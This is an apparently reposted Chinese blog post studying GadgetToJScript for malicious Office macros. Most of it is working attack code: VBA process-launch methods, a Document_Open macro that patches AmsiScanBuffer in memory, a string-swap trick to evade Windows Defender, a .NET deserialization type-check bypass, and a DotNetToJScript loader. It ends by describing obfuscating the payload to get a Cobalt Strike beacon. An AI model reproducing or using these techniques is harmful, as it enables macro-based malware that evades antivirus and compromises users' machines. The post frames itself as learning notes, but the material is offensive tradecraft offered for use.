投稿获客
  1. 创想鸟首页
  2. 用户投稿

GadgetToJScript在VBA中的利用

程序猿 用户投稿 阅读 4

前言:

最近在学习一些不错的思路,本文是对下面文章的学习记录。

https://www.shutingrz.com/post/explore-dotnet-serialize-g2js/

开了原创,方便转载,勿喷。

本文将浅析GadgetToJScript的反序列化原理与在VBA中的利用。首先我们来看一下VBA中常见的执行方式

WScript.Shell:

代码语言:javascript代码运行次数:0运行复制

CreateObject("WScript.Shell").Run "calc.exe"CreateObject("WScript.Shell").Exec "notepad.exe"


GadgetToJScript在VBA中的利用


进程树如下:


GadgetToJScript在VBA中的利用


用来反弹会话时,代码如下:


代码语言:javascript代码运行次数:0运行复制


CreateObject("WScript.Shell").Run "powershell.exe ..............."


调用WMI:


主要为使用wmi的Win32_Process的Create方法


代码语言:javascript代码运行次数:0运行复制


s = GetObject("winmgmts:.ootcimv2:Win32_Process").Create("notepad.exe", Null, Null, intProcessID)


GadgetToJScript在VBA中的利用


进程树如下


GadgetToJScript在VBA中的利用


调用COM:


{9BA05972-F6A8-11CF-A442-00A0C90A8F39}{72C24DD5-D70A-438B-8A42-98424B88AFB8}{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}代码语言:javascript代码运行次数:0运行复制


Set obj3 = GetObject("new:13709620-C279-11CE-A49E-444553540000")obj3.ShellExecute "PowerShell.exe", "", "", "runas", 0


进程树(与你的CISID有关)


GadgetToJScript在VBA中的利用


Outlook.Application:


代码语言:javascript代码运行次数:0运行复制


Set outlookApp = CreateObject("Outlook.Application")outlookApp.CreateObject("Wscript.shell").Run "notepad.exe", 0


进程树


GadgetToJScript在VBA中的利用


而这些方法因为都已公开许久,都或多或少的会被检测到。而拿我们常用的CS之类的为例,我们生成载荷,然后运行,在监控中会很清楚的看到过程被amsi所监控(payload做了简单修改)


GadgetToJScript在VBA中的利用


检查过程如下:


GadgetToJScript在VBA中的利用


而整个过程微软解释如下:


GadgetToJScript在VBA中的利用


而在VBA中的被检测的列表已有大佬整理了出来:


https://github.com/synacktiv/AMSI-Bypass


GadgetToJScript在VBA中的利用


GadgetToJScript在VBA中的利用


当然,DDE与excel 4.0是不受amsi所保护的。而amsi的bypass也早已是老生常谈的话题,例如outflank提出的


https://outflank.nl/blog/2019/04/17/bypassing-amsi-for-vba/


或者是在VBA中进行memory patch


                                                                        PatentPal专利申请写作                                                                            PatentPal专利申请写作                            


AI软件来为专利申请自动生成内容


                                                            PatentPal专利申请写作                                13                                                                                                        查看详情                            PatentPal专利申请写作                                                            代码语言:javascript代码运行次数:0运行复制


Private Declare PtrSafe Function GetProcAddress Lib "kernel32" (ByVal hModule As LongPtr, ByVal lpProcName As String) As LongPtrPrivate Declare PtrSafe Function LoadLibrary Lib "kernel32" Alias "LoadLibraryA" (ByVal lpLibFileName As String) As LongPtrPrivate Declare PtrSafe Function VirtualProtect Lib "kernel32" (lpAddress As Any, ByVal dwSize As LongPtr, ByVal flNewProtect As Long, lpflOldProtect As Long) As LongPrivate Declare PtrSafe Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (Destination As Any, Source As Any, ByVal Length As LongPtr)Private Sub Document_Open()    Dim AmsiDLL As LongPtr    Dim AmsiScanBufferAddr As LongPtr    Dim result As Long    Dim MyByteArray(6) As Byte    Dim ArrayPointer As LongPtr    MyByteArray(0) = 184 ' 0xB8    MyByteArray(1) = 87  ' 0x57    MyByteArray(2) = 0   ' 0x00    MyByteArray(3) = 7   ' 0x07    MyByteArray(4) = 128 ' 0x80    MyByteArray(5) = 195 ' 0xC3    AmsiDLL = LoadLibrary("amsi.dll")    AmsiScanBufferAddr = GetProcAddress(AmsiDLL, "AmsiScanBuffer")    result = VirtualProtect(ByVal AmsiScanBufferAddr, 5, 64, 0)    ArrayPointer = VarPtr(MyByteArray(0))    CopyMemory ByVal AmsiScanBufferAddr, ByVal ArrayPointer, 6    End Sub


但此类方法,亦会被windows defende + amsi 所拦截


GadgetToJScript在VBA中的利用


GadgetToJScript在VBA中的利用


而此类的检查则是基于字符串的,即amsi.dll与RtlMoveMemory,将RtlMoveMemory改成RtlFillMemory即可bypass,效果大体如下


GadgetToJScript在VBA中的利用


GadgetToJScript与.net


在某些脚本语言中可以使用com对象,而com对象可以用来调用.net


GadgetToJScript在VBA中的利用


而GadgetToJScript本质是反序列化的利用,下面是一个基础的反序列化代码


代码如下:


代码语言:javascript代码运行次数:0运行复制


using System;using System.Collections.Generic;using System.Linq;using System.Text;using System.IO;using System.Runtime.Serialization;using System.Runtime.Serialization.Formatters.Binary;using System.Configuration;namespace serializable{    class NonSerializable    {        private string _text;        public NonSerializable(string text){            _text = text;        }        public override string ToString(){            return _text;        }    }    // Custom serialization surrogate    class _SurrogateSelector : SurrogateSelector    {        public override ISerializationSurrogate GetSurrogate(Type type, StreamingContext context, out ISurrogateSelector selector){            selector = this;            if (!type.IsSerializable)            {                Type t = Type.GetType("System.Workflow.ComponentModel.Serialization.ActivitySurrogateSelector+ObjectSurrogate, System.Workflow.ComponentModel, Version=3.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35");                return (ISerializationSurrogate)Activator.CreateInstance(t);            }            return base.GetSurrogate(type, context, out selector);        }    }    class Program    {        static void TestObjectSerializedRef(){            BinaryFormatter fmt = new BinaryFormatter();            MemoryStream stm = new MemoryStream();            fmt.SurrogateSelector = new _SurrogateSelector();            fmt.Serialize(stm, new NonSerializable("Hello World!"));            stm.Position = 0;            // Should print Hello World!.            Console.WriteLine(fmt.Deserialize(stm));        }        static void Main(string[] args){             TestObjectSerializedRef();        }    }}


上述代码的意思是NonSerializable 类在构造函数中接受一个字符串,然后重写ToString函数,并返回一个sting对象。ToString允许 C# 中的所有类隐式继承 Object 类并返回一个字符串表示,所以当 Console.WriteLine() 被调用时会返回Hello World! 但是这个类没有Serializable属性,所以本质上是不能序列化的。但我们可以覆盖 SurrogateSelector 类的 GetSurrogate 方法,使其可以被反序列化。


编译执行,报错,这是因为.NET 4.8增加了对反序列化的检查。


GadgetToJScript在VBA中的利用


我们可以使用设置DisableActivitySurrogateSelectorTypeCheck来绕过该检测。


代码语言:javascript代码运行次数:0运行复制


        static void Main(string[] args)        {            ConfigurationManager.AppSettings.Set("microsoft:WorkflowComponentModel:DisableActivitySurrogateSelectorTypeCheck", "true");            TestObjectSerializedRef();        }


成功反序列化。


GadgetToJScript在VBA中的利用


使用DotNetToJScript 操作上述代码,生成的代码类似如下:


代码语言:javascript代码运行次数:0运行复制


Function Base64ToStream(b,l)  Dim enc, length, transform, ms  Set enc = CreateObject("System.Text.ASCIIEncoding")  length = enc.GetByteCount_2(b)  Set transform = CreateObject("System.Security.Cryptography.FromBase64Transform")  Set ms = CreateObject("System.IO.MemoryStream")  ms.Write transform.TransformFinalBlock(enc.GetBytes_4(b), 0, length), 0, l  ms.Position = 0  Set Base64ToStream = msEnd FunctionDim shellSet shell = CreateObject("WScript.Shell")Dim verver = "v4.0.30319"On Error Resume Nextshell.RegRead "HKLMSOFTWAREMicrosoft.NETFramework4.0.30319"If Err.Number  0 Then  ver = "v2.0.50727"  Err.ClearEnd Ifshell.Environment("Process").Item("COMPLUS_Version") = verDim fmt_1Set fmt_1 = CreateObject("System.Runtime.Serialization.Formatters.Binary.BinaryFormatter")fmt_1.Deserialize_2(Base64ToStream(stage_1, 2341))If Err.Number  0 Then  Dim fmt_2  Set fmt_2 = CreateObject("System.Runtime.Serialization.Formatters.Binary.BinaryFormatter")  fmt_2.Deserialize_2(Base64ToStream(stage_2, 12424))End If


即使用COM 组件反序列化 Base64 编码的 .NET 对象。其代码结构解释如下:


GadgetToJScript在VBA中的利用


即BinaryFormatter的反序列化加载。假设有下面的代码:


代码语言:javascript代码运行次数:0运行复制


using System;using System.Windows.Forms;namespace Test{    public class Program    {    public Program()    {      MessageBox.Show("Hello, World!");    }    }}


生成vbs文件:


代码语言:javascript代码运行次数:0运行复制


GadgetToJScript.exe -b -w vbs -c hello.cs -o test -d System.dll -d System.Windows.Forms.dll


GadgetToJScript在VBA中的利用


静态可过windows defender ,执行可以弹框。然后放入宏中


GadgetToJScript在VBA中的利用


然后我们换成之前的COM 对象来启动进程,弹出notepad


GadgetToJScript在VBA中的利用


但是直接生成的payload是会被windows defender所检测到的,需要自行混淆。混淆后绕过windows defender执行成功。


GadgetToJScript在VBA中的利用


但目前该类方法我们利用起来仍然不是很好利用,因为虽然可以绕过windows defender的检测,但假如我们使用com去调用powershell远程加载的时候仍然无法绕过widnows defender。但这已不是宏需要考虑的了,而是在powershell中amsi patch的问题了,在前方的代码中加入amsi patch,即可然过wdf对ps的检查,得到Cs的beacon。


GadgetToJScript在VBA中的利用




更多精彩推荐,请关注我们






以上就是GadgetToJScript在VBA中的利用的详细内容,更多请关注创想鸟其它相关文章!


                                                        
版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。

如发现本站有涉嫌抄袭侵权/违法违规的内容, 请发送邮件至 chuangxiangniao@163.com 举报,一经查实,本站将立刻删除。

发布者:程序猿,转转请注明出处:https://www.chuangxiangniao.com/p/377654.html
(0)
打赏 微信扫一扫 微信扫一扫 支付宝扫一扫 支付宝扫一扫
0 0

关于作者

程序猿的头像

程序猿签约作者

414.1K 文章
0 评论
2 粉丝
这个人很懒,什么都没有留下~
MySQL语句查看各个数据库占用空间的方法(附代码)
上一篇 2025年11月6日 10:13:08
如何解决centos7 vnc界面乱码问题
下一篇 2025年11月6日 10:13:13

相关推荐

  • 修复Django电商项目中AJAX过滤产品列表图片不显示问题 用户投稿

    修复Django电商项目中AJAX过滤产品列表图片不显示问题

    在Django电商项目中,当使用AJAX动态加载过滤后的产品列表时,常遇到图片无法正常显示的问题。这通常是由于前端模板中图片加载方式(如data-setbg属性结合JavaScript库)与AJAX动态内容更新机制不兼容所致。解决方案是直接在AJAX返回的HTML中使用标准的标签来渲染图片,确保浏览…

    程序猿的头像 程序猿
    2026年5月10日
    000
  • 开源免费PHP工具 PHP开发效率提升利器 用户投稿

    开源免费PHP工具 PHP开发效率提升利器

    推荐开源免费PHP开发工具以提升效率:VS Code、Sublime Text轻量高效,PhpStorm专业强大;调试用Xdebug、Kint、Ray;依赖管理选Composer;代码质量工具包括PHPStan、Psalm、PHP_CodeSniffer;数据库管理可用%ignore_a_1%MyA…

    程序猿的头像 程序猿
    2026年5月10日
    000

  • Matplotlib 地图中多类型图例的创建与优化

    Matplotlib 地图中多类型图例的创建与优化Matplotlib 地图中多类型图例的创建与优化Matplotlib 地图中多类型图例的创建与优化Matplotlib 地图中多类型图例的创建与优化

    本教程旨在解决matplotlib地图可视化中,如何在一个图例中同时展示颜色块(如区域分类)和自定义标记(如特定兴趣点)的问题。文章详细介绍了当传统`patch`对象无法正确显示标记时,如何利用`matplotlib.lines.line2d`创建标记图例句柄,并将其与颜色块图例句柄合并,从而生成一…

    程序猿的头像 程序猿
    2026年5月10日 用户投稿
    100
  • Golang JSON序列化:控制敏感字段暴露的最佳实践 用户投稿

    Golang JSON序列化:控制敏感字段暴露的最佳实践

    本教程探讨golang中如何高效控制结构体字段在json序列化时的可见性。当需要将包含敏感信息的结构体数组转换为json响应时,通过利用`encoding/json`包提供的结构体标签,特别是`json:”-“`,可以轻松实现对特定字段的忽略,从而避免敏感数据泄露,确保api…

    程序猿的头像 程序猿
    2026年5月10日
    000
  • 怎么在PHP代码中实现图片上传功能_PHP图片上传功能实现与安全处理教程 用户投稿

    怎么在PHP代码中实现图片上传功能_PHP图片上传功能实现与安全处理教程

    首先创建含enctype的HTML表单,再用PHP接收文件,检查目录、移动临时文件,验证类型与大小,生成唯一文件名,并调整php.ini限制以确保上传成功。 如果您尝试在PHP项目中添加图片上传功能,但服务器无法正确接收或保存文件,则可能是由于表单配置、文件处理逻辑或安全限制的问题。以下是实现该功能…

    程序猿的头像 程序猿
    2026年5月10日
    100
  • 比特币新手教程 比特币交易平台有哪些 用户投稿

    比特币新手教程 比特币交易平台有哪些

    比特币是一种去中心化的数字货币,基于区块链技术实现点对点交易,具有匿名性、有限发行和不可篡改等特点;新手可通过交易所购买,P2P交易获得比特币,常用平台包括Binance、OKX和Huobi;交易流程包括注册账户、实名认证、绑定支付方式、充值法币并下单购买,可选择市价单或限价单;比特币存储方式有交易…

    程序猿的头像 程序猿
    2026年5月10日
    000
  • c++中的SFINAE技术是什么_c++模板编程中的SFINAE原理与应用 用户投稿

    c++中的SFINAE技术是什么_c++模板编程中的SFINAE原理与应用

    SFINAE 是“替换失败不是错误”的原则,指模板实例化时若参数替换导致错误,只要存在其他合法候选,编译器不报错而是继续重载决议。它用于条件启用模板、类型检测等场景,如通过 decltype 或 enable_if 控制函数重载,实现类型特征判断。尽管 C++20 引入 Concepts 简化了部分…

    程序猿的头像 程序猿
    2026年5月10日
    000
  • Go语言mgo查询构建:深入理解bson.M与日期范围查询的正确实践 用户投稿

    Go语言mgo查询构建:深入理解bson.M与日期范围查询的正确实践

    本文旨在解决go语言mgo库中构建复杂查询时,特别是涉及嵌套`bson.m`和日期范围筛选的常见错误。我们将深入剖析`bson.m`的类型特性,解释为何直接索引`interface{}`会导致“invalid operation”错误,并提供一种推荐的、结构清晰的代码重构方案,以确保查询条件能够正确…

    程序猿的头像 程序猿
    2026年5月10日
    100
  • 修复点击时按钮抖动:CSS垂直对齐实践 用户投稿

    修复点击时按钮抖动:CSS垂直对齐实践

    本文探讨了在Web开发中,交互式按钮(如播放/暂停按钮)在点击时发生意外垂直位移的问题。通过分析CSS样式变化对元素布局的影响,我们发现这是由于按钮不同状态下的边框样式和内边距改变,以及默认的垂直对齐行为共同作用所致。核心解决方案是利用CSS的vertical-align属性,将其设置为middle…

    程序猿的头像 程序猿
    2026年5月10日
    100
  • Golang goroutine与channel调试技巧 用户投稿

    Golang goroutine与channel调试技巧

    使用go run -race检测数据竞争,结合runtime.NumGoroutine监控协程数量,通过pprof分析阻塞调用栈,利用select超时避免永久阻塞,有效排查goroutine泄漏、死锁和数据竞争问题。 Go语言的goroutine和channel是并发编程的核心,但它们也带来了调试上…

    程序猿的头像 程序猿
    2026年5月10日
    000

  • 《魔兽世界》将于6月11日开启国服回归技术测试

    《魔兽世界》将于6月11日开启国服回归技术测试《魔兽世界》将于6月11日开启国服回归技术测试《魔兽世界》将于6月11日开启国服回归技术测试《魔兽世界》将于6月11日开启国服回归技术测试

    《%ign%ignore_a_1%re_a_1%》官方宣布,将于6月11日开启国服回归技术测试,时间为7天,并称可以在6月内正式开服,玩家们可以访问官网下载战网客户端并预下载“巫妖王之怒”客户端,技术测试详情见下图。 WordAi WordAI是一个AI驱动的内容重写平台 53 查看详情 以上就是《…

    程序猿的头像 程序猿
    2026年5月10日 用户投稿
    200
  • 使用 Jupyter Notebook 进行探索性数据分析 用户投稿

    使用 Jupyter Notebook 进行探索性数据分析

    Jupyter Notebook通过单元格实现代码与Markdown结合,支持数据导入(pandas)、清洗(fillna)、探索(matplotlib/seaborn可视化)、统计分析(describe/corr)和特征工程,便于记录与分享分析过程。 Jupyter Notebook 是进行探索性…

    程序猿的头像 程序猿
    2026年5月10日
    000
  • 如何在HTML中插入表单元素_HTML表单控件与输入类型使用指南 用户投稿

    如何在HTML中插入表单元素_HTML表单控件与输入类型使用指南

    HTML表单通过标签构建,包含action和method属性定义数据提交目标与方式,常用input类型如text、password、email等适配不同输入需求,配合label、required、placeholder提升可用性,结合textarea、select、button等控件实现完整交互,是…

    程序猿的头像 程序猿
    2026年5月10日
    100
  • 前端缓存策略与JavaScript存储管理 用户投稿

    前端缓存策略与JavaScript存储管理

    根据数据特性选择合适的存储方式并制定清晰的读写与清理逻辑,能显著提升前端性能;合理运用Cookie、localStorage、sessionStorage、IndexedDB及Cache API,结合缓存策略与定期清理机制,可在保证用户体验的同时避免安全与性能隐患。 前端缓存和JavaScript存…

    程序猿的头像 程序猿
    2026年5月10日
    200
  • HTML5网页如何实现手势操作 HTML5网页移动端交互的处理技巧 用户投稿

    HTML5网页如何实现手势操作 HTML5网页移动端交互的处理技巧

    首先利用原生touch事件实现滑动判断,再通过preventDefault解决滚动冲突,接着引入Hammer.js处理复杂手势,最后通过优化点击区域、避免事件冲突和增加视觉反馈提升体验。 在移动端浏览器中,HTML5网页可以通过触摸事件实现手势操作,提升用户体验。虽然原生JavaScript提供了基…

    程序猿的头像 程序猿
    2026年5月10日
    000
  • 创建指定大小并填充特定数据的Golang文件教程 用户投稿

    创建指定大小并填充特定数据的Golang文件教程

    本文将介绍如何使用Golang创建一个指定大小的文件,并用特定数据填充它。我们将使用 `os` 包提供的函数来创建和截断文件,从而实现快速生成大文件的目的。示例代码展示了如何创建一个10MB的文件,并将其填充为全零数据。掌握这些方法,可以方便地在例如日志系统或磁盘队列等场景中,预先创建测试文件或初始…

    程序猿的头像 程序猿
    2026年5月10日
    000
  • 深入理解 Express.js 中 next() 参数的作用与中间件机制 用户投稿

    深入理解 Express.js 中 next() 参数的作用与中间件机制

    本文深入探讨 express.js 中间件函数中的 `next()` 参数。它负责将控制权传递给请求-响应周期中的下一个中间件或路由处理程序。文章将详细解释 `next()` 的工作原理、中间件的注册与执行顺序,以及不正确使用 `next()` 可能导致请求挂起的风险,并通过代码示例和实际应用场景,…

    程序猿的头像 程序猿
    2026年5月10日
    000
  • Python命令怎样使用profile分析脚本性能 Python命令性能分析的基础教程 用户投稿

    Python命令怎样使用profile分析脚本性能 Python命令性能分析的基础教程

    使用Python的cProfile模块分析脚本性能最直接的方式是通过命令行执行python -m cProfile your_script.py,它会输出每个函数的调用次数、总耗时、累积耗时等关键指标,帮助定位性能瓶颈;为进一步分析,可将结果保存为文件python -m cProfile -o ou…

    程序猿的头像 程序猿
    2026年5月10日
    000

  • 如何插入查询结果数据_SQL插入Select查询结果方法

    如何插入查询结果数据_SQL插入Select查询结果方法如何插入查询结果数据_SQL插入Select查询结果方法如何插入查询结果数据_SQL插入Select查询结果方法如何插入查询结果数据_SQL插入Select查询结果方法

    使用INSERT INTO…SELECT语句可高效插入数据,通过NOT EXISTS、LEFT JOIN、MERGE语句或唯一约束避免重复;表结构不一致时可通过别名、类型转换、默认值或计算字段处理;结合存储过程可提升可维护性,支持参数化与动态SQL。 将查询结果数据插入到另一个表中,可以…

    程序猿的头像 程序猿
    2026年5月10日 用户投稿
    000
  • 使用 WebCodecs VideoDecoder 实现精确逐帧回退 用户投稿

    使用 WebCodecs VideoDecoder 实现精确逐帧回退

    本文档旨在解决在使用 WebCodecs VideoDecoder 进行视频解码时,实现精确逐帧回退的问题。通过比较帧的时间戳与目标帧的时间戳,可以避免渲染中间帧,从而提高用户体验。本文将提供详细的解决方案和示例代码,帮助开发者实现精确的视频帧控制。 在使用 WebCodecs VideoDecod…

    程序猿的头像 程序猿
    2026年5月10日
    000

发表回复

登录后才能评论
关注微信